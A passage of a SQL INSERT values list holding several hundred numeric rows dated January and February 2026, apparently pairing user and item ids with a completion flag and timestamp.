(338, 42, 613, '2026-01-23', 0, 0, 0, NULL),
(339, 94, 710, '2026-01-23', 0, 0, 0, NULL),
(340, 94, 956, '2026-01-23', 0, 0, 0, NULL),
(341, 94, 253, '2026-01-23', 0, 0, 0, NULL),
(342, 94, 218, '2026-01-23', 0, 0, 0, NULL),
(343, 94, 630, '2026-01-23', 0, 0, 0, NULL),
(344, 94, 949, '2026-01-23', 0, 0, 0, NULL),
(345, 94, 951, '2026-01-23', 0, 0, 0, NULL),
(346, 94, 219, '2026-01-23', 0, 0, 0, NULL),
(347, 94, 632, '2026-01-23', 0, 0, 0, NULL),
(348, 94, 259, '2026-01-23', 0, 0, 0, NULL),
(349, 34, 753, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(350, 34, 945, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(351, 34, 947, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(352, 34, 946, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(353, 34, 840, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(354, 34, 745, '2026-01-24', 1, 0, 0, '2026-02-11 05:45:24'),
(355, 34, 959, '2026-01-24', 1, 0, 0, '2026-02-13 04:56:20'),
(356, 34, 1026, '2026-01-24', 0, 0, 0, NULL),
(357, 34, 748, '2026-01-24', 0, 0, 0, NULL),
(358, 34, 956, '2026-01-24', 0, 0, 0, NULL),
(359, 79, 680, '2026-01-24', 0, 0, 0, NULL),
(360, 79, 695, '2026-01-24', 1, 0, 0, '2026-01-24 15:35:04'),
(361, 79, 609, '2026-01-24', 0, 0, 0, NULL),
(362, 79, 735, '2026-01-24', 0, 0, 0, NULL),
(363, 79, 731, '2026-01-24', 0, 0, 0, NULL),
(364, 79, 692, '2026-01-24', 0, 0, 0, NULL),
(365, 79, 746, '2026-01-24', 0, 0, 0, NULL),
(366, 79, 624, '2026-01-24', 0, 0, 0, NULL),
(367, 79, 853, '2026-01-24', 1, 0, 0, '2026-01-24 15:35:20'),
(368, 79, 694, '2026-01-24', 0, 0, 0, NULL),
(369, 1, 649, '2026-01-24', 0, 0, 0, NULL),
(370, 1, 717, '2026-01-24', 0, 0, 0, NULL),
(371, 1, 699, '2026-01-24', 0, 0, 0, NULL),
(372, 1, 763, '2026-01-24', 0, 0, 0, NULL),
(373, 1, 841, '2026-01-24', 0, 0, 0, NULL),
(374, 1, 230, '2026-01-24', 0, 0, 0, NULL),
(375, 1, 941, '2026-01-24', 0, 0, 0, NULL),
(376, 1, 738, '2026-01-24', 0, 0, 0, NULL),
(377, 1, 754, '2026-01-24', 0, 0, 0, NULL),
(378, 1, 721, '2026-01-24', 0, 0, 0, NULL),
(379, 34, 762, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(380, 34, 955, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(381, 34, 745, '2026-01-25', 1, 0, 0, '2026-02-11 05:45:24'),
(382, 34, 959, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(383, 34, 753, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(384, 34, 956, '2026-01-25', 0, 0, 0, NULL),
(385, 34, 946, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(386, 34, 750, '2026-01-25', 0, 0, 0, NULL),
(387, 34, 660, '2026-01-25', 0, 0, 0, NULL),
(388, 34, 840, '2026-01-25', 1, 0, 0, '2026-02-13 04:56:20'),
(389, 1, 252, '2026-01-25', 0, 0, 0, NULL),
(390, 1, 646, '2026-01-25', 0, 0, 0, NULL),
(391, 1, 674, '2026-01-25', 0, 0, 0, NULL),
(392, 1, 234, '2026-01-25', 0, 0, 0, NULL),
(393, 1, 302, '2026-01-25', 0, 0, 0, NULL),
(394, 1, 768, '2026-01-25', 0, 0, 0, NULL),
(395, 1, 942, '2026-01-25', 0, 0, 0, NULL),
(396, 1, 666, '2026-01-25', 0, 0, 0, NULL),
(397, 1, 947, '2026-01-25', 0, 0, 0, NULL),
(398, 1, 700, '2026-01-25', 0, 0, 0, NULL),
(399, 97, 636, '2026-01-25', 0, 0, 0, NULL),
(400, 97, 949, '2026-01-25', 0, 0, 0, NULL),
(401, 97, 958, '2026-01-25', 0, 0, 0, NULL),
(402, 97, 957, '2026-01-25', 0, 0, 0, NULL),
(403, 97, 234, '2026-01-25', 0, 0, 0, NULL),
(404, 97, 687, '2026-01-25', 0, 0, 0, NULL),
(405, 97, 951, '2026-01-25', 0, 0, 0, NULL),
(406, 97, 219, '2026-01-25', 0, 0, 0, NULL),
(407, 97, 630, '2026-01-25', 0, 0, 0, NULL),
(408, 97, 239, '2026-01-25', 0, 0, 0, NULL),
(409, 98, 238, '2026-01-25', 0, 0, 0, NULL),
(410, 98, 959, '2026-01-25', 0, 0, 0, NULL),
(411, 98, 219, '2026-01-25', 0, 0, 0, NULL),
(412, 98, 729, '2026-01-25', 0, 0, 0, NULL),
(413, 98, 951, '2026-01-25', 0, 0, 0, NULL),
(414, 98, 954, '2026-01-25', 0, 0, 0, NULL),
(415, 98, 282, '2026-01-25', 0, 0, 0, NULL),
(416, 98, 252, '2026-01-25', 0, 0, 0, NULL),
(417, 98, 234, '2026-01-25', 0, 0, 0, NULL),
(418, 98, 216, '2026-01-25', 0, 0, 0, NULL),
(419, 42, 687, '2026-01-25', 0, 0, 0, NULL),
(420, 42, 724, '2026-01-25', 0, 0, 0, NULL),
(421, 42, 614, '2026-01-25', 0, 0, 0, NULL),
(422, 42, 605, '2026-01-25', 0, 0, 0, NULL),
(423, 42, 738, '2026-01-25', 0, 0, 0, NULL),
(424, 42, 842, '2026-01-25', 0, 0, 0, NULL),
(425, 42, 238, '2026-01-25', 0, 0, 0, NULL),
(426, 42, 834, '2026-01-25', 0, 0, 0, NULL),
(427, 42, 767, '2026-01-25', 0, 0, 0, NULL),
(428, 42, 957, '2026-01-25', 0, 0, 0, NULL),
(429, 99, 959, '2026-01-25', 1, 0, 0, '2026-02-15 08:05:47'),
(430, 99, 630, '2026-01-25', 1, 0, 0, '2026-02-16 19:56:52'),
(431, 99, 710, '2026-01-25', 0, 0, 0, NULL),
(432, 99, 949, '2026-01-25', 0, 0, 0, NULL),
(433, 99, 238, '2026-01-25', 1, 0, 0, '2026-02-15 08:07:16'),
(434, 99, 253, '2026-01-25', 0, 0, 0, NULL),
(435, 99, 709, '2026-01-25', 1, 0, 0, '2026-02-15 08:02:39'),
(436, 99, 953, '2026-01-25', 1, 0, 0, '2026-02-18 12:08:36'),
(437, 99, 221, '2026-01-25', 0, 0, 0, NULL),
(438, 99, 951, '2026-01-25', 0, 0, 0, NULL),
(439, 74, 955, '2026-01-25', 0, 0, 0, NULL),
(440, 74, 840, '2026-01-25', 0, 0, 0, NULL),
(441, 74, 956, '2026-01-25', 0, 0, 0, NULL),
(442, 74, 959, '2026-01-25', 0, 0, 0, NULL),
(443, 74, 947, '2026-01-25', 0, 0, 0, NULL),
(444, 74, 945, '2026-01-25', 0, 0, 0, NULL),
(445, 74, 946, '2026-01-25', 0, 0, 0, NULL),
(446, 74, 671, '2026-01-25', 0, 0, 0, NULL),
(447, 74, 666, '2026-01-25', 0, 0, 0, NULL),
(448, 74, 697, '2026-01-25', 0, 0, 0, NULL),
(449, 102, 233, '2026-01-25', 0, 0, 0, NULL),
(450, 102, 956, '2026-01-25', 1, 0, 0, '2026-02-11 16:59:58'),
(451, 102, 760, '2026-01-25', 0, 0, 0, NULL),
(452, 102, 951, '2026-01-25', 1, 0, 0, '2026-02-11 17:00:33'),
(453, 102, 221, '2026-01-25', 0, 0, 0, NULL),
(454, 102, 252, '2026-01-25', 1, 0, 0, '2026-02-16 05:40:52'),
(455, 102, 253, '2026-01-25', 0, 0, 0, NULL),
(456, 102, 955, '2026-01-25', 0, 0, 0, NULL),
(457, 102, 959, '2026-01-25', 0, 0, 0, NULL),
(458, 102, 238, '2026-01-25', 0, 0, 0, NULL),
(459, 102, 729, '2026-01-26', 0, 0, 0, NULL),
(460, 102, 959, '2026-01-26', 0, 0, 0, NULL),
(461, 102, 250, '2026-01-26', 0, 0, 0, NULL),
(462, 102, 239, '2026-01-26', 0, 0, 0, NULL),
(463, 102, 953, '2026-01-26', 0, 0, 0, NULL),
(464, 102, 252, '2026-01-26', 1, 0, 0, '2026-02-16 05:40:52'),
(465, 102, 709, '2026-01-26', 0, 0, 0, NULL),
(466, 102, 229, '2026-01-26', 0, 0, 0, NULL),
(467, 102, 230, '2026-01-26', 0, 0, 0, NULL),
(468, 102, 630, '2026-01-26', 0, 0, 0, NULL),
(469, 107, 729, '2026-01-27', 0, 0, 0, NULL),
(470, 107, 250, '2026-01-27', 0, 0, 0, NULL),
(471, 107, 954, '2026-01-27', 0, 0, 0, NULL),
(472, 107, 710, '2026-01-27', 0, 0, 0, NULL),
(473, 107, 953, '2026-01-27', 0, 0, 0, NULL),
(474, 107, 632, '2026-01-27', 0, 0, 0, NULL),
(475, 107, 238, '2026-01-27', 0, 0, 0, NULL),
(476, 107, 959, '2026-01-27', 0, 0, 0, NULL),
(477, 107, 958, '2026-01-27', 0, 0, 0, NULL),
(478, 107, 219, '2026-01-27', 0, 0, 0, NULL),
(479, 108, 762, '2026-01-27', 0, 0, 0, NULL),
(480, 108, 219, '2026-01-27', 0, 0, 0, NULL),
(481, 108, 959, '2026-01-27', 0, 0, 0, NULL),
(482, 108, 956, '2026-01-27', 0, 0, 0, NULL),
(483, 108, 233, '2026-01-27', 0, 0, 0, NULL),
(484, 108, 302, '2026-01-27', 0, 0, 0, NULL),
(485, 108, 253, '2026-01-27', 0, 0, 0, NULL),
(486, 108, 632, '2026-01-27', 0, 0, 0, NULL),
(487, 108, 216, '2026-01-27', 0, 0, 0, NULL),
(488, 108, 953, '2026-01-27', 0, 0, 0, NULL),
(489, 109, 709, '2026-01-27', 0, 0, 0, NULL),
(490, 109, 953, '2026-01-27', 0, 0, 0, NULL),
(491, 109, 624, '2026-01-27', 1, 0, 0, '2026-02-15 11:28:03'),
(492, 109, 216, '2026-01-27', 1, 0, 0, '2026-02-15 11:29:35'),
(493, 109, 760, '2026-01-27', 0, 0, 0, NULL),
(494, 109, 229, '2026-01-27', 0, 0, 0, NULL),
(495, 109, 958, '2026-01-27', 0, 0, 0, NULL),
(496, 109, 632, '2026-01-27', 0, 0, 0, NULL),
(497, 109, 221, '2026-01-27', 0, 0, 0, NULL),
(498, 109, 636, '2026-01-27', 0, 0, 0, NULL),
(499, 107, 224, '2026-01-28', 1, 0, 0, '2026-01-28 19:29:47'),
(500, 107, 233, '2026-01-28', 1, 0, 0, '2026-01-28 18:04:50'),
(501, 107, 221, '2026-01-28', 0, 0, 0, NULL),
(502, 107, 729, '2026-01-28', 0, 0, 0, NULL),
(503, 107, 219, '2026-01-28', 0, 0, 0, NULL),
(504, 107, 636, '2026-01-28', 0, 0, 0, NULL),
(505, 107, 216, '2026-01-28', 0, 0, 0, NULL),
(506, 107, 957, '2026-01-28', 0, 0, 0, NULL),
(507, 107, 954, '2026-01-28', 0, 0, 0, NULL),
(508, 107, 238, '2026-01-28', 0, 0, 0, NULL),
(509, 34, 945, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(510, 34, 955, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(511, 34, 840, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(512, 34, 959, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(513, 34, 762, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(514, 34, 956, '2026-01-28', 0, 0, 0, NULL),
(515, 34, 745, '2026-01-28', 1, 0, 0, '2026-02-11 05:45:24'),
(516, 34, 747, '2026-01-28', 0, 0, 0, NULL),
(517, 34, 957, '2026-01-28', 0, 0, 0, NULL),
(518, 34, 230, '2026-01-28', 0, 0, 0, NULL),
(519, 107, 958, '2026-01-29', 0, 0, 0, NULL),
(520, 107, 687, '2026-01-29', 0, 0, 0, NULL),
(521, 107, 252, '2026-01-29', 0, 0, 0, NULL),
(522, 107, 951, '2026-01-29', 0, 0, 0, NULL),
(523, 107, 239, '2026-01-29', 0, 0, 0, NULL),
(524, 107, 956, '2026-01-29', 0, 0, 0, NULL),
(525, 107, 959, '2026-01-29', 0, 0, 0, NULL),
(526, 107, 709, '2026-01-29', 0, 0, 0, NULL),
(527, 107, 302, '2026-01-29', 0, 0, 0, NULL),
(528, 107, 234, '2026-01-29', 0, 0, 0, NULL),
(529, 107, 760, '2026-01-30', 0, 0, 0, NULL),
(530, 107, 959, '2026-01-30', 0, 0, 0, NULL),
(531, 107, 229, '2026-01-30', 0, 0, 0, NULL),
(532, 107, 729, '2026-01-30', 0, 0, 0, NULL),
(533, 107, 253, '2026-01-30', 0, 0, 0, NULL),
(534, 107, 957, '2026-01-30', 0, 0, 0, NULL),
(535, 107, 954, '2026-01-30', 0, 0, 0, NULL),
(536, 107, 219, '2026-01-30', 0, 0, 0, NULL),
(537, 107, 239, '2026-01-30', 0, 0, 0, NULL),
(538, 107, 958, '2026-01-30', 0, 0, 0, NULL),
(539, 115, 632, '2026-01-31', 0, 0, 0, NULL),
(540, 115, 955, '2026-01-31', 0, 0, 0, NULL),
(541, 115, 630, '2026-01-31', 0, 0, 0, NULL),
(542, 115, 762, '2026-01-31', 0, 0, 0, NULL),
(543, 115, 957, '2026-01-31', 0, 0, 0, NULL),
(544, 115, 710, '2026-01-31', 0, 0, 0, NULL),
(545, 115, 624, '2026-01-31', 0, 0, 0, NULL),
(546, 115, 238, '2026-01-31', 0, 0, 0, NULL),
(547, 115, 954, '2026-01-31', 0, 0, 0, NULL),
(548, 115, 687, '2026-01-31', 0, 0, 0, NULL),
(549, 116, 954, '2026-02-01', 0, 0, 0, NULL),
(550, 116, 252, '2026-02-01', 0, 0, 0, NULL),
(551, 116, 951, '2026-02-01', 0, 0, 0, NULL),
(552, 116, 958, '2026-02-01', 0, 0, 0, NULL),
(553, 116, 687, '2026-02-01', 0, 0, 0, NULL),
(554, 116, 253, '2026-02-01', 0, 0, 0, NULL),
(555, 116, 229, '2026-02-01', 0, 0, 0, NULL),
(556, 116, 238, '2026-02-01', 0, 0, 0, NULL),
(557, 116, 949, '2026-02-01', 0, 0, 0, NULL),
(558, 116, 636, '2026-02-01', 0, 0, 0, NULL),
(559, 34, 745, '2026-02-01', 1, 0, 0, '2026-02-11 05:45:24'),
(560, 34, 762, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(561, 34, 945, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(562, 34, 959, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(563, 34, 840, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(564, 34, 947, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(565, 34, 753, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(566, 34, 1042, '2026-02-01', 0, 0, 0, NULL),
(567, 34, 701, '2026-02-01', 0, 0, 0, NULL),
(568, 34, 946, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(569, 34, 947, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(570, 34, 762, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(571, 34, 745, '2026-02-02', 1, 0, 0, '2026-02-11 05:45:24'),
(572, 34, 956, '2026-02-02', 0, 0, 0, NULL),
(573, 34, 955, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(574, 34, 940, '2026-02-02', 0, 0, 0, NULL),
(575, 34, 945, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(576, 34, 838, '2026-02-02', 0, 0, 0, NULL),
(577, 34, 229, '2026-02-02', 0, 0, 0, NULL),
(578, 34, 854, '2026-02-02', 0, 0, 0, NULL),
(579, 123, 953, '2026-02-02', 0, 0, 0, NULL),
(580, 123, 958, '2026-02-02', 0, 0, 0, NULL),
(581, 123, 955, '2026-02-02', 0, 0, 0, NULL),
(582, 123, 230, '2026-02-02', 0, 0, 0, NULL),
(583, 123, 951, '2026-02-02', 0, 0, 0, NULL),
(584, 123, 636, '2026-02-02', 0, 0, 0, NULL),
(585, 123, 957, '2026-02-02', 0, 0, 0, NULL),
(586, 123, 949, '2026-02-02', 0, 0, 0, NULL),
(587, 123, 238, '2026-02-02', 0, 0, 0, NULL),
(588, 123, 302, '2026-02-02', 0, 0, 0, NULL),
(589, 124, 630, '2026-02-02', 0, 0, 0, NULL),
(590, 124, 729, '2026-02-02', 0, 0, 0, NULL),
(591, 124, 949, '2026-02-02', 0, 0, 0, NULL),
(592, 124, 687, '2026-02-02', 0, 0, 0, NULL),
(593, 124, 760, '2026-02-02', 0, 0, 0, NULL),
(594, 124, 959, '2026-02-02', 0, 0, 0, NULL),
(595, 124, 239, '2026-02-02', 0, 0, 0, NULL),
(596, 124, 252, '2026-02-02', 0, 0, 0, NULL),
(597, 124, 636, '2026-02-02', 0, 0, 0, NULL),
(598, 124, 954, '2026-02-02', 0, 0, 0, NULL),
(599, 107, 216, '2026-02-02', 0, 0, 0, NULL),
(600, 107, 654, '2026-02-02', 0, 0, 0, NULL),
(601, 107, 758, '2026-02-02', 0, 0, 0, NULL),
(602, 107, 751, '2026-02-02', 0, 0, 0, NULL),
(603, 107, 849, '2026-02-02', 0, 0, 0, NULL),
(604, 107, 854, '2026-02-02', 0, 0, 0, NULL),
(605, 107, 934, '2026-02-02', 0, 0, 0, NULL),
(606, 107, 757, '2026-02-02', 0, 0, 0, NULL),
(607, 107, 734, '2026-02-02', 0, 0, 0, NULL),
(608, 107, 945, '2026-02-02', 0, 0, 0, NULL),
(609, 123, 216, '2026-02-03', 0, 0, 0, NULL),
(610, 123, 252, '2026-02-03', 0, 0, 0, NULL),
(611, 123, 760, '2026-02-03', 0, 0, 0, NULL),
(612, 123, 624, '2026-02-03', 0, 0, 0, NULL),
(613, 123, 234, '2026-02-03', 0, 0, 0, NULL),
(614, 123, 253, '2026-02-03', 0, 0, 0, NULL),
(615, 123, 954, '2026-02-03', 0, 0, 0, NULL),
(616, 123, 229, '2026-02-03', 0, 0, 0, NULL),
(617, 123, 250, '2026-02-03', 0, 0, 0, NULL),
(618, 123, 230, '2026-02-03', 0, 0, 0, NULL),
(619, 34, 959, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(620, 34, 946, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(621, 34, 940, '2026-02-03', 0, 0, 0, NULL),
(622, 34, 955, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(623, 34, 753, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(624, 34, 745, '2026-02-03', 1, 0, 0, '2026-02-11 05:45:24'),
(625, 34, 840, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(626, 34, 737, '2026-02-03', 0, 0, 0, NULL),
(627, 34, 942, '2026-02-03', 0, 0, 0, NULL),
(628, 34, 956, '2026-02-03', 0, 0, 0, NULL),
(629, 109, 216, '2026-02-03', 1, 0, 0, '2026-02-15 11:29:35'),
(630, 109, 230, '2026-02-03', 1, 0, 0, '2026-02-18 16:54:52'),
(631, 109, 250, '2026-02-03', 0, 0, 0, NULL),
(632, 109, 710, '2026-02-03', 0, 0, 0, NULL),
(633, 109, 949, '2026-02-03', 1, 0, 0, '2026-02-15 01:55:46'),
(634, 109, 957, '2026-02-03', 0, 0, 0, NULL),
(635, 109, 955, '2026-02-03', 0, 0, 0, NULL),
(636, 109, 302, '2026-02-03', 0, 0, 0, NULL),
(637, 109, 956, '2026-02-03', 0, 0, 0, NULL),
(638, 109, 687, '2026-02-03', 0, 0, 0, NULL),
(639, 125, 710, '2026-02-04', 0, 0, 0, NULL),
(640, 125, 216, '2026-02-04', 0, 0, 0, NULL),
(641, 125, 253, '2026-02-04', 0, 0, 0, NULL),
(642, 125, 221, '2026-02-04', 0, 0, 0, NULL),
(643, 125, 252, '2026-02-04', 0, 0, 0, NULL),
(644, 125, 949, '2026-02-04', 0, 0, 0, NULL),
(645, 125, 219, '2026-02-04', 0, 0, 0, NULL),
(646, 125, 760, '2026-02-04', 0, 0, 0, NULL),
(647, 125, 239, '2026-02-04', 0, 0, 0, NULL),
(648, 125, 956, '2026-02-04', 0, 0, 0, NULL),
(649, 34, 745, '2026-02-04', 1, 0, 0, '2026-02-11 05:45:24'),
(650, 34, 956, '2026-02-04', 0, 0, 0, NULL),
(651, 34, 955, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(652, 34, 945, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(653, 34, 940, '2026-02-04', 0, 0, 0, NULL),
(654, 34, 946, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(655, 34, 840, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(656, 34, 710, '2026-02-04', 0, 0, 0, NULL),
(657, 34, 702, '2026-02-04', 0, 0, 0, NULL),
(658, 34, 230, '2026-02-04', 0, 0, 0, NULL),
(659, 126, 302, '2026-02-04', 0, 0, 0, NULL),
(660, 126, 253, '2026-02-04', 0, 0, 0, NULL),
(661, 126, 252, '2026-02-04', 0, 0, 0, NULL),
(662, 126, 250, '2026-02-04', 0, 0, 0, NULL),
(663, 126, 954, '2026-02-04', 0, 0, 0, NULL),
(664, 126, 953, '2026-02-04', 0, 0, 0, NULL),
(665, 126, 957, '2026-02-04', 0, 0, 0, NULL),
(666, 126, 636, '2026-02-04', 0, 0, 0, NULL),
(667, 126, 956, '2026-02-04', 0, 0, 0, NULL),
(668, 126, 958, '2026-02-04', 0, 0, 0, NULL),
(669, 34, 959, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(670, 34, 956, '2026-02-05', 0, 0, 0, NULL),
(671, 34, 753, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(672, 34, 947, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(673, 34, 940, '2026-02-05', 0, 0, 0, NULL),
(674, 34, 945, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(675, 34, 840, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(676, 34, 839, '2026-02-05', 0, 0, 0, NULL),
(677, 34, 619, '2026-02-05', 0, 0, 0, NULL),
(678, 34, 230, '2026-02-05', 0, 0, 0, NULL),
(679, 74, 956, '2026-02-05', 0, 0, 0, NULL),
(680, 74, 947, '2026-02-05', 0, 0, 0, NULL),
(681, 74, 946, '2026-02-05', 0, 0, 0, NULL),
(682, 74, 955, '2026-02-05', 0, 0, 0, NULL),
(683, 74, 945, '2026-02-05', 0, 0, 0, NULL),
(684, 74, 959, '2026-02-05', 0, 0, 0, NULL),
(685, 74, 840, '2026-02-05', 0, 0, 0, NULL),
(686, 74, 250, '2026-02-05', 0, 0, 0, NULL),
(687, 74, 846, '2026-02-05', 0, 0, 0, NULL),
(688, 74, 234, '2026-02-05', 0, 0, 0, NULL),
(689, 65, 951, '2026-02-05', 0, 0, 0, NULL),
(690, 65, 234, '2026-02-05', 0, 0, 0, NULL),
(691, 65, 219, '2026-02-05', 0, 0, 0, NULL),
(692, 65, 253, '2026-02-05', 0, 0, 0, NULL),
(693, 65, 955, '2026-02-05', 0, 0, 0, NULL),
(694, 65, 238, '2026-02-05', 0, 0, 0, NULL),
(695, 65, 624, '2026-02-05', 0, 0, 0, NULL),
(696, 65, 636, '2026-02-05', 1, 0, 0, '2026-02-05 20:00:26'),
(697, 65, 710, '2026-02-05', 0, 0, 0, NULL),
(698, 65, 953, '2026-02-05', 0, 0, 0, NULL),
(699, 127, 632, '2026-02-05', 0, 0, 0, NULL),
(700, 127, 710, '2026-02-05', 0, 0, 0, NULL),
(701, 127, 949, '2026-02-05', 0, 0, 0, NULL),
(702, 127, 951, '2026-02-05', 0, 0, 0, NULL),
(703, 127, 957, '2026-02-05', 0, 0, 0, NULL),
(704, 127, 959, '2026-02-05', 0, 0, 0, NULL),
(705, 127, 953, '2026-02-05', 0, 0, 0, NULL),
(706, 127, 219, '2026-02-05', 0, 0, 0, NULL),
(707, 127, 238, '2026-02-05', 0, 0, 0, NULL),
(708, 127, 234, '2026-02-05', 0, 0, 0, NULL),
(709, 126, 954, '2026-02-05', 0, 0, 0, NULL),
(710, 126, 762, '2026-02-05', 0, 0, 0, NULL),
(711, 126, 710, '2026-02-05', 0, 0, 0, NULL),
(712, 126, 687, '2026-02-05', 0, 0, 0, NULL),
(713, 126, 624, '2026-02-05', 0, 0, 0, NULL),
(714, 126, 632, '2026-02-05', 0, 0, 0, NULL),
(715, 126, 949, '2026-02-05', 0, 0, 0, NULL),
(716, 126, 250, '2026-02-05', 0, 0, 0, NULL),
(717, 126, 219, '2026-02-05', 0, 0, 0, NULL),
(718, 126, 239, '2026-02-05', 0, 0, 0, NULL),
(719, 126, 250, '2026-02-06', 0, 0, 0, NULL),
(720, 126, 229, '2026-02-06', 0, 0, 0, NULL),
(721, 126, 238, '2026-02-06', 0, 0, 0, NULL),
(722, 126, 949, '2026-02-06', 0, 0, 0, NULL),
(723, 126, 762, '2026-02-06', 0, 0, 0, NULL),
(724, 126, 951, '2026-02-06', 0, 0, 0, NULL),
(725, 126, 760, '2026-02-06', 0, 0, 0, NULL),
(726, 126, 729, '2026-02-06', 0, 0, 0, NULL),
(727, 126, 958, '2026-02-06', 0, 0, 0, NULL),
(728, 126, 630, '2026-02-06', 0, 0, 0, NULL),
(729, 128, 238, '2026-02-07', 0, 0, 0, NULL),
(730, 128, 949, '2026-02-07', 0, 0, 0, NULL),
(731, 128, 760, '2026-02-07', 0, 0, 0, NULL),
(732, 128, 630, '2026-02-07', 0, 0, 0, NULL),
(733, 128, 252, '2026-02-07', 0, 0, 0, NULL),
(734, 128, 632, '2026-02-07', 0, 0, 0, NULL),
(735, 128, 221, '2026-02-07', 0, 0, 0, NULL),
(736, 128, 955, '2026-02-07', 0, 0, 0, NULL),
(737, 128, 954, '2026-02-07', 0, 0, 0, NULL),
(738, 128, 762, '2026-02-07', 0, 0, 0, NULL),
(739, 123, 302, '2026-02-07', 0, 0, 0, NULL),
(740, 123, 234, '2026-02-07', 0, 0, 0, NULL),
(741, 123, 239, '2026-02-07', 0, 0, 0, NULL),
(742, 123, 253, '2026-02-07', 0, 0, 0, NULL),
(743, 123, 229, '2026-02-07', 0, 0, 0, NULL),
(744, 123, 252, '2026-02-07', 0, 0, 0, NULL),
(745, 123, 687, '2026-02-07', 0, 0, 0, NULL),
(746, 123, 958, '2026-02-07', 0, 0, 0, NULL),
(747, 123, 959, '2026-02-07', 0, 0, 0, NULL),
(748, 123, 956, '2026-02-07', 0, 0, 0, NULL),
(749, 34, 955, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(750, 34, 840, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(751, 34, 753, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(752, 34, 956, '2026-02-07', 0, 0, 0, NULL),
(753, 34, 947, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(754, 34, 959, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(755, 34, 940, '2026-02-07', 0, 0, 0, NULL),
(756, 34, 652, '2026-02-07', 0, 0, 0, NULL),
(757, 34, 663, '2026-02-07', 0, 0, 0, NULL),
(758, 34, 230, '2026-02-07', 0, 0, 0, NULL),
(759, 129, 949, '2026-02-07', 0, 0, 0, NULL),
(760, 129, 954, '2026-02-07', 0, 0, 0, NULL),
(761, 129, 762, '2026-02-07', 0, 0, 0, NULL),
(762, 129, 219, '2026-02-07', 0, 0, 0, NULL),
(763, 129, 687, '2026-02-07', 0, 0, 0, NULL),
(764, 129, 229, '2026-02-07', 0, 0, 0, NULL),
(765, 129, 710, '2026-02-07', 0, 0, 0, NULL),
(766, 129, 250, '2026-02-07', 0, 0, 0, NULL),
(767, 129, 216, '2026-02-07', 0, 0, 0, NULL),
(768, 129, 957, '2026-02-07', 0, 0, 0, NULL),
(769, 34, 959, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(770, 34, 745, '2026-02-08', 1, 0, 0, '2026-02-11 05:45:24'),
(771, 34, 946, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(772, 34, 945, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(773, 34, 753, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(774, 34, 955, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(775, 34, 947, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(776, 34, 685, '2026-02-08', 0, 0, 0, NULL),
(777, 34, 674, '2026-02-08', 0, 0, 0, NULL),
(778, 34, 840, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(779, 131, 253, '2026-02-08', 0, 0, 0, NULL),
(780, 131, 709, '2026-02-08', 0, 0, 0, NULL),
(781, 131, 729, '2026-02-08', 0, 0, 0, NULL),
(782, 131, 219, '2026-02-08', 0, 0, 0, NULL),
(783, 131, 957, '2026-02-08', 0, 0, 0, NULL),
(784, 131, 252, '2026-02-08', 0, 0, 0, NULL),
(785, 131, 221, '2026-02-08', 0, 0, 0, NULL),
(786, 131, 624, '2026-02-08', 0, 0, 0, NULL),
(787, 131, 250, '2026-02-08', 0, 0, 0, NULL),
(788, 131, 234, '2026-02-08', 0, 0, 0, NULL),
(789, 133, 959, '2026-02-08', 0, 0, 0, NULL),
(790, 133, 729, '2026-02-08', 0, 0, 0, NULL),
(791, 133, 219, '2026-02-08', 0, 0, 0, NULL),
(792, 133, 252, '2026-02-08', 0, 0, 0, NULL),
